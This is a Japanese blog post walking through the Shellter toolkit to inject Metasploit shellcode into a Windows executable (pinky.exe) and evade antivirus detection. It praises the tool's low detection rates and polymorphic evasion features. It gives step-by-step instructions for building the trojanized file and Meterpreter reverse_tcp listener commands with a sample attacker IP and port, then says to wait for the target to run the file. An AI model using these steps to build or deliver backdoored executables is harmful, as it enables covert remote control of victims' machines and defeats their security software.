Pyclas on Security

pyclas@xmpp.cm (OTR)

動的シェルインジェクションツールキットを用いたPEヘッダ汚染による、シェルコードのアンチウィルスソフト検知の回避

イントロダクション
脆弱性識別子のような抽象的な日本語のタイトルにしてみました。
要約するとshellterというツールキットを使った、AV検知回避です。
 
Shellterとは
windowsネイティブアプリケーション(x86のみ対応)のPEファイルフォーマットにシェルコードを注入し、汚染することができる。
MSFのようなフレームワークから(自身で生成されたものでも可能)

f:id:pyclas:20150816153005p:image

 
特徴は以下のとおりです。
  • Linux / Mac用のWindows(XPのSP3以上)&ワイン/クロスオーバーと互換性
  • ポータブル (セットアップの必要性がない)
  • 余分な依存関係を(pythonや.NETなど)は不必要
  • 静的PEテンプレート、フレームワークのラッパー等...
  • 32ビットのペイロードのサポート。(Metasploitのまたはカスタムのもののいずれかによって生成された)
  • Metasploitのによる符号化のすべてのタイプと互換性
  • ユーザが作成したカスタム·エンコードに対応
  • ステルスモード
  • マルチペイロードPE感染
  • 独自のエンコーディング
  • 動的スレッドコンテキストキー
  • 反射DLLローダーをサポートしています。
  • 組み込みMetasploitのペイロード
  • ジャンクコード多型エンジン
  • スレッドコンテキストを意識多型エンジン
ユーザーは自分のカスタム多型コードを使用することができます
  • 抗静的解析のための動的スレッドコンテキスト情報の利用
  • 自己修正コードの検出
  • シングルおよびマルチスレッド·アプリケーションのトレース
とまぁなんとなく便利そうでVTとかの検出率も低く、便利そうです。

kaliのレポジトリでも提供されているようですが、ver3.1であるため、最新版の4.0を使いましょう
ダウンロードはこちら(https://www.shellterproject.com/download
 
使い方
 
  1. shellterをダウンロード
  2. kaliのusr/shere/windows-binaryからshellterディレクトリにpinky.exeを突っ込む
  3. コンソールに”shellter”と入力し、shellterを起動
  4. "A"でオートマティックモードを選択
  5. PEターゲットプロンプトに"pinky.exe”
  6. PayloadでLを選択し1を選ぶ
  7. 自身のIPアドレスとポートを選択(metasploitでRHOSTとポートを選択するように)
  8. shellterが難読化を開始

f:id:pyclas:20150816153010p:image

• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
exploit

送信したターゲットが実行ファイルを実行するのを待つ
またインジェクション前のファイルサイズと、現在のファイルサイズに変わりはありません。
 

f:id:pyclas:20150816153008p:image